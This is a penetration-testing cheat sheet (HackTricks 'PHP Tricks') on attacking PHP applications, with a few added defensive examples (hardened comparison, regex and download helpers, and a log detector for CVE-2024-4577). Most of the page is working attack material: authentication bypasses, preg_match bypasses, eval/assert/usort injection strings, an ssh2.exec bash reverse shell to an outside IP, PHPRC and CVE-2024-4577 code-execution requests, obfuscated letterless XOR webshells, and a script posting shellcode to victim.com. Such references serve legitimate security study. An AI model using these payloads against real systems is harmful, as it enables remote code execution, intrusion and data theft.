PHP Tricks

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cookies common location:

This is also valid for phpMyAdmin cookies.

Cookies:

PHPSESSID
phpMyAdmin

Locations:

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

Bypassing PHP comparisons

Loose comparisons/Type Juggling ( == )

If == is used in PHP, there are unexpected cases where the comparison doesn't behave as expected. This is because "==" only compares values after converting them to the same type; if you also want to check that the type of the compared data is the same, you need to use ===.

PHP comparison tables: https://www.php.net/manual/en/types.comparisons.php

  • "string" == 0 -> True A string which doesn't start with a number is equal to a number
  • "0xAAAA" == "43690" -> True Strings composed of numbers in dec or hex format can be compared to other numbers/strings with True as the result if the numbers were the same (numbers in a string are interpreted as numbers)
  • "0e3264578" == 0 --> True A string starting with "0e" and followed by anything will be equal to 0
  • "0X3264578" == 0X --> True A string starting with "0" followed by any letter (X can be any letter) and followed by anything will be equal to 0
  • "0e12334" == "0" --> True This is very interesting because in some cases you can control the string input of "0" and some content that is being hashed and compared to it. Therefore, if you can provide a value that will create a hash starting with "0e" and without any letter, you could bypass the comparison. You can find already hashed strings with this format here: https://github.com/spaze/hashes
  • "X" == 0 --> True Any letter in a string is equal to int 0

More info in https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09

in_array()

Type Juggling also affects the in_array() function by default (you need to set the third argument to true to make a strict comparison):

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

If this function is used for any authentication check (like checking the password) and the user controls one side of the comparison, they can send an empty array instead of a string as the value of the password (https://example.com/login.php/?username=admin&password[]=) and bypass this check:

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

The same error occurs with strcasecmp()

Strict type Juggling

Even if === is being used there could be errors that make the comparison vulnerable to type juggling. For example, if the comparison is converting the data to a different type of object before comparing:

(int) "1abc" === (int) "1xyz" //This will be true
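
The comparison pitfalls above next to their strict replacements, as an added example that is not part of the original page. The helper names and all sample values are constructed for illustration, and the `mixed` type assumes PHP 8.

```php
<?php
declare(strict_types=1);

// Constructed values: two different strings that both look like "0e<digits>".
$stored   = '0e12334';
$supplied = '0e99999';

// Loose: both operands are numeric strings, so they are compared as floats (0.0 and 0.0).
var_dump($stored == $supplied);
// Strict: same type and same bytes are required.
var_dump($stored === $supplied);
// hash_equals() compares bytes in constant time and only accepts strings.
var_dump(hash_equals($stored, $supplied));

/** Hypothetical helper: compare a request value with the expected secret. */
function secret_matches(string $expected, mixed $candidate): bool
{
    // password[]= arrives as an array; reject it before any comparison runs.
    if (!is_string($candidate)) {
        return false;
    }
    return hash_equals($expected, $candidate);
}

/** Hypothetical helper: allow-list lookup with the third in_array() argument set. */
function is_allowed_value(mixed $candidate, array $allowed): bool
{
    return in_array($candidate, $allowed, true);
}

/** Hypothetical helper: validate the whole string instead of casting its prefix. */
function parse_id(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    return $id === false ? null : $id;
}

var_dump(secret_matches('real_pwd', []));
var_dump(secret_matches('real_pwd', 'real_pwd'));
var_dump(is_allowed_value(0, ['apple', 'orange', 'pear', 'grape']));
var_dump(parse_id('1abc'), parse_id('1xyz'), parse_id('1'));
```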

preg_match(/^.*/)

preg_match() could be used to validate user input (it checks if any word/regex from a blacklist is present in the user input and, if it's not, the code can continue its execution).

New line bypass

However, when delimiting the start of the regexp, preg_match() only checks the first line of the user input, so if you can somehow send the input in several lines, you could be able to bypass this check. Example:

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match finds the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match finds the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

To bypass this check you could send the value with the new lines URL-encoded (%0A) or, if you can send JSON data, send it in several lines:

{
"cmd": "cat /etc/passwd"
}

Find an example here: https://ramadistra.dev/fbctf-2019-rceservice

Length error bypass

(This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15)
If you can send to preg_match() a valid very large input, it won't be able to process it and you will be able to bypass the check. For example, if it is blacklisting a JSON you could send:

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

From: https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0

ReDoS Bypass

Trick from: https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223 and https://mizu.re/post/pong

In short, the problem happens because the preg_* functions in PHP build upon the PCRE library. In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the number of recursions allowed, but in PHP this limit defaults to 100.000, which is more than fits in the stack.

This Stackoverflow thread was also linked in the post where this issue is discussed in more depth. Our task was now clear:
Send an input that would make the regex do 100_000+ recursions, causing SIGSEGV, making the preg_match() function return false and thus making the application think that our input is not malicious, throwing the surprise at the end of the payload, something like {system(<verybadcommand>)}, to get SSTI --> RCE --> flag :).

Well, in regex terms, we're not actually doing 100k "recursions", but instead we're counting "backtracking steps", which, as the PHP documentation states, defaults to 1_000_000 (1M) in the pcre.backtrack_limit variable.
To reach that, 'X'*500_001 will result in 1 million backtracking steps (500k forward and 500k backwards):

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
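
Both the new line bypass and the backtracking bypass work because the caller misreads what preg_match() reports, so the following added example (not part of the original page or the linked writeups) shows a validator that anchors on the whole subject and fails closed when the engine returns false. The function names and inputs are constructed, and the limits are lowered only so that the error path is cheap to reach.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical allow-list validator for a short single-line name.
 * \A and \z anchor to the real start and end of the subject (\z does not
 * tolerate a trailing newline), and the character class contains no "." that
 * could stop at "\n". Length is capped before the regex engine runs.
 */
function is_safe_name(mixed $input): bool
{
    if (!is_string($input) || strlen($input) > 64) {
        return false;
    }
    $result = preg_match('/\A[a-z0-9_-]+\z/', $input);
    if ($result === false) {
        // Engine error (backtrack limit, JIT stack, bad UTF-8): fail closed.
        error_log('preg_match error code ' . preg_last_error());
        return false;
    }
    return $result === 1;
}

/**
 * Deny-list check kept in the page's style, with the return value read
 * strictly: false means "the engine gave up", which is treated as a hit.
 */
function contains_denied(string $input, string $denyPattern): bool
{
    $result = preg_match($denyPattern, $input);
    return $result === false || $result === 1;
}

// Constructed two-line input, same shape as the page's $myinput.
$multiline = "aaaaaaa\n11111111";
var_dump(preg_match('/^.*1/', $multiline));          // page's pattern, no modifiers
var_dump(contains_denied($multiline, '/^.*1/s'));    // s lets "." cross newlines
var_dump(is_safe_name($multiline), is_safe_name("ls\n"), is_safe_name('status'));

// Lowered limits so the error path is reached with a tiny subject. The pattern
// and subject are the backtracking example from the PHP manual's
// preg_last_error() page.
ini_set('pcre.jit', '0');
ini_set('pcre.backtrack_limit', '1000');
$pattern = '/(?:\D+|<\d+>)*[!?]/';
$subject = 'foobar foobar foobar';
var_dump(preg_match($pattern, $subject));
var_dump(preg_last_error() === PREG_BACKTRACK_LIMIT_ERROR);
var_dump(contains_denied($subject, $pattern));
```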

Type Juggling for PHP obfuscation

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

Execute After Redirect (EAR)

If PHP is redirecting to another page but no die or exit function is called after the Location header is set, PHP continues executing and appending the data to the body:

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

Path Traversal and File Inclusion Exploitation

Check:

File Inclusion/Path traversal

More tricks

  • register_globals: In PHP < 4.1.1.1 or if misconfigured, register_globals may be active (or its behavior is being mimicked). This implies that for global variables like $_GET, if they have a value e.g. $_GET["param"]="1234", you can access it via $param. Therefore, by sending HTTP parameters you can overwrite variables that are used within the code.
  • The PHPSESSION cookies of the same domain are stored in the same place, therefore if within a domain different cookies are used in different paths you can make a path access the cookie of the other path by setting the value of the other path's cookie.
    This way, if both paths access a variable with the same name, you can make the value of that variable in path1 apply to path2. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
  • When you have the usernames of the users of the machine, check the address /~<USERNAME> to see if the php directories are activated.
  • If a php config has register_argc_argv = On, then query params separated by spaces are used to populate the array of arguments array_keys($_SERVER['argv']) as if they were arguments from the CLI. This is interesting because if that setting is Off, the value of the argv array will be Null when called from the web, as the args array won't be populated. Therefore, if a web page tries to check whether it's running as a web or as a CLI tool with a comparison like if (empty($_SERVER['argv'])) { an attacker could send parameters in the GET request like ?--configPath=/lalala and it will think it's running as CLI and potentially parse and use those arguments. More info in the original writeup.
  • LFI and RCE using php wrappers

password_hash/password_verify

These functions are typically used in PHP to generate hashes from passwords and to check if a password is correct compared with a hash.
The supported algorithms are: PASSWORD_DEFAULT and PASSWORD_BCRYPT (starts with $2y$). Note that PASSWORD_DEFAULT is frequently the same as PASSWORD_BCRYPT. And currently, PASSWORD_BCRYPT has a size limitation in the input of 72bytes. Therefore, when you try to hash something larger than 72bytes with this algorithm, only the first 72B will be used:

$cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSWORD_BCRYPT));
// False

$cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSWORD_BCRYPT));
// True

HTTP headers bypass abusing PHP errors

Causing error after setting headers

From this Twitter thread you can see that when sending more than 1000 GET params or 1000 POST params or 20 files, PHP is not going to be setting headers in the response.

This allows bypassing, for example, CSP headers being set in code like:

<?php
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

Filling a body before setting headers

If a PHP page is printing errors and echoing back some input provided by the user, the user can make the PHP server print back some content long enough so that when it tries to add the headers into the response the server will throw an error.
In the following scenario the attacker made the server throw some big errors, and as you can see in the screenshot, when PHP tried to modify the header information, it couldn't (so for example the CSP header wasn't sent to the user).

SSRF in PHP functions

Check the page:

PHP SSRF

ssh2.exec stream wrapper RCE

When the ssh2 extension is installed (ssh2.so visible under /etc/php*/mods-available/, php -m, or even an FTP-accessible php8.1_conf/ directory), PHP registers ssh2.* wrappers that can be abused anywhere user input is concatenated into fopen()/file_get_contents() targets. An admin-only download helper such as:

$wrapper = strpos($_GET['format'], '://') !== false ? $_GET['format'] : '';
$file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');

is enough to execute shell commands through localhost SSH:

GET /download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1:22/ping%2010.10.14.6%20-c%201#

  • The credential portion can reuse any leaked system password (e.g., from cracked bcrypt hashes).
  • The trailing # comments out the server-side suffix (files/<id>.zip), so only your command runs.
  • Blind RCE is confirmed by watching egress with tcpdump -ni tun0 icmp or by serving an HTTP canary.

Replace the command with a reverse shell payload once confirmed:

format=ssh2.exec://yuri:mustang@127.0.0.1:22/bash%20-c%20'bash%20-i%20>&%20/dev/tcp/10.10.14.6/443%200>&1'#

Because everything happens inside the PHP worker, the TCP connection originates from the target and inherits the privileges of the injected account (yuri, eric, etc.).
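
A hardened form of the download helper, as an added example that is not the application's own code: the request supplies only a numeric id, so no scheme can be prepended, and the ssh2.* wrappers are unregistered when the application has no use for them. The function names, the storage directory and the sample file are assumptions made for the example, which requires PHP 8.

```php
<?php
declare(strict_types=1);

/** List the ssh2.* stream wrappers registered in this PHP process. */
function ssh2_wrappers(): array
{
    return array_values(array_filter(
        stream_get_wrappers(),
        static fn (string $w): bool => str_starts_with($w, 'ssh2.')
    ));
}

/** Unregister them for the rest of the request when nothing legitimate uses them. */
function drop_ssh2_wrappers(): void
{
    foreach (ssh2_wrappers() as $wrapper) {
        stream_wrapper_unregister($wrapper);
    }
}

/**
 * Hypothetical replacement for the helper: scheme, directory and extension are
 * fixed by the server; the caller only chooses a numeric id.
 * Returns a read handle, or false when the request is rejected.
 */
function open_download(mixed $id, string $baseDir)
{
    if (!is_string($id) || !ctype_digit($id)) {
        return false;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    // realpath() resolves local filesystem paths only, so a wrapper URL never survives it.
    $path = realpath($base . DIRECTORY_SEPARATOR . $id . '.zip');
    if ($path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return false;
    }
    return fopen($path, 'rb');
}

// Constructed demo data in a temporary directory.
drop_ssh2_wrappers();
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . '54.zip', 'constructed sample content');

var_dump(ssh2_wrappers());
var_dump(is_resource(open_download('54', $dir)));
var_dump(open_download('ssh2.exec://u:p@127.0.0.1:22/id#', $dir));
var_dump(open_download(['54'], $dir));
```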

Code execution

system("ls");
`ls`;
shell_exec("ls");

Check this for more useful PHP functions

RCE via preg_replace()

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

To execute the code in the "replace" argument at least one match is needed.
This option of preg_replace has been deprecated as of PHP 5.5.0.

RCE via Eval()

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

RCE via Assert()

This function within php allows you to execute code that is written in a string in order to return true or false (and depending on this alter the execution). Usually the user variable will be inserted in the middle of a string. For example:
assert("strpos($_GET['page']),'..') === false") --> In this case, to get RCE you could do:

?page=a','NeVeR') === false and system('ls') and strpos('a

You will need to break the code syntax, add your payload, and then fix it again. You can use logic operations such as "and" or "%26%26" or "|". Note that "or", "||" doesn't work because if the first condition is true our payload won't get executed. In the same way ";" doesn't work, as our payload won't be executed.

Another option is to add to the string the execution of the command: '.highlight_file('.passwd').'

Another option (if you have the internal code) is to modify some variable to alter the execution: $file = "hola"

RCE via usort()

This function is used to sort an array of items using a specific function.
To abuse this function:

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>
<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

You can also use // to comment the rest of the code.

To discover the number of parentheses that you need to close:

  • ?order=id;}//: we get an error message (Parse error: syntax error, unexpected ';'). We are probably missing one or more brackets.
  • ?order=id);}//: we get a warning. That seems about right.
  • ?order=id));}//: we get an error message (Parse error: syntax error, unexpected ')' i). We probably have too many closing brackets.

RCE via .htaccess

If you can upload a .htaccess, then you can configure several things and even execute code (configuring that files with extension .htaccess can be executed).

Different .htaccess shells can be found here

RCE via Env Variables

If you find a vulnerability that allows you to modify env variables in PHP (and another one to upload files, although with more research maybe this can be bypassed), you could abuse this behaviour to get RCE.

  • LD_PRELOAD: This env variable allows you to load arbitrary libraries when executing other binaries (although in this case it might not work).
  • PHPRC: Instructs PHP on where to locate its configuration file, usually called php.ini. If you can upload your own config file, then use PHPRC to point PHP at it. Add an auto_prepend_file entry specifying a second uploaded file. This second file contains normal PHP code, which is then executed by the PHP runtime before any other code.
  1. Upload a PHP file containing our shellcode
  2. Upload a second file, containing an auto_prepend_file directive instructing the PHP preprocessor to execute the file we uploaded in step 1
  3. Set the PHPRC variable to the file we uploaded in step 2.
  • Get more info on how to execute this chain from the original report.
  • PHPRC - another option
  • If you cannot upload files, you could use in FreeBSD the "file" /dev/fd/0 which contains the stdin, being the body of the request sent to the stdin:
  • curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
  • Or to get RCE, enable allow_url_include and prepend a file with base64 PHP code:
  • curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
  • Technique from this report.

XAMPP CGI RCE - CVE-2024-4577

The webserver parses HTTP requests and passes them to a PHP script, executing a request such as http://host/cgi.php?foo=bar as php.exe cgi.php foo=bar, which allows a parameter injection. This allows injecting the following parameters to load the PHP code from the body:

-d allow_url_include=1 -d auto_prepend_file=php://input

Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check the exploit example from this post:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
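
For detection, the request shape above can be searched for in web server access logs. The following is an added example, not taken from the original page or the referenced post; it assumes combined log format, and the function names and log lines are constructed.

```php
<?php
declare(strict_types=1);

/**
 * Return the option-like arguments hidden in a request target's query string.
 * A query without an unencoded "=" is handed to a CGI program as command-line
 * arguments split on "+" (RFC 3875, section 4.4); an argument that starts with
 * "-" or with byte 0xAD (%AD, which the page says is later normalised to "-")
 * is then read as a php-cgi switch.
 */
function find_cgi_switches(string $requestTarget): array
{
    $pos = strpos($requestTarget, '?');
    if ($pos === false) {
        return [];
    }
    $query = substr($requestTarget, $pos + 1);
    if ($query === '' || str_contains($query, '=')) {
        return [];
    }
    $found = [];
    $args = array_map('rawurldecode', explode('+', $query));
    foreach ($args as $i => $arg) {
        if ($arg !== '' && $arg[0] === "\xAD") {
            $arg = '-' . substr($arg, 1);
        }
        if (str_starts_with($arg, '-')) {
            // Keep the switch together with the value that follows it.
            $found[] = trim($arg . ' ' . ($args[$i + 1] ?? ''));
        }
    }
    return $found;
}

/** Scan access-log lines and return the switches found, keyed by line number. */
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $switches = find_cgi_switches($m[1]);
        if ($switches !== []) {
            $hits[$n + 1] = $switches;
        }
    }
    return $hits;
}

// Constructed sample log lines (documentation IP ranges).
$log = [
    '192.0.2.10 - - [01/Jul/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "curl/8.3.0"',
    '203.0.113.7 - - [01/Jul/2024:10:00:05 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 90 "-" "curl/8.3.0"',
    '192.0.2.10 - - [01/Jul/2024:10:00:09 +0000] "GET /search.php?q=a+b HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
];
print_r(scan_access_log($log));
```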

PHP Sanitization bypass & Brain Fuck

In this post it's possible to find great ideas to generate a brain fuck PHP code with very few chars allowed.
Moreover, an interesting way to execute functions that allowed them to bypass several checks is also proposed:

(1)->{system($_GET[chr(97)])}

PHP Static analysis

Look if you can insert code in calls to these functions (from here):

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_contents
$_COOKIE | if #This mea

If you are debugging a PHP application you can globally enable error printing in /etc/php5/apache2/php.ini by adding display_errors = On and restarting apache: sudo systemctl restart apache2

Deobfuscating PHP code

You can use the website www.unphp.net to deobfuscate PHP code.

PHP Wrappers & Protocols

PHP wrappers and protocols could allow you to bypass write and read protections in a system and compromise it. For more information check this page.

Xdebug unauthenticated RCE

If you see that Xdebug is enabled in a phpconfig() output you should try to get RCE via https://github.com/nqxcode/xdebug-exploit

Variable variables

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

RCE abusing new $_GET["a"]($_GET["b"])

If in a page you can create a new object of an arbitrary class you might be able to obtain RCE; check the following page to learn how:

Php Rce Abusing Object Creation New Usd Get A Usd Get B

Execute PHP without letters

https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/

Using octal

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

XOR

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If $___ not needed then $_($__), show_source(.passwd)

XOR easy shell code

According to this writeup, it's possible to generate an easy shellcode this way:

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

So, if you can execute arbitrary PHP without numbers and letters you can send a request like the following, abusing that payload to execute arbitrary PHP:

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

For a more in-depth explanation check https://ctf-wiki.org/web/php/php/#preg_match

XOR Shellcode (inside eval)

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\$<>/'^'{{{{';\${\$_}[_](\${\$_}[__]);"
# $_='$<>/'^'{{{{'; --> _GET
# ${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])
# So, the function is inside $_GET[_] and the parameter is inside $_GET[__]
http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Perl like

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
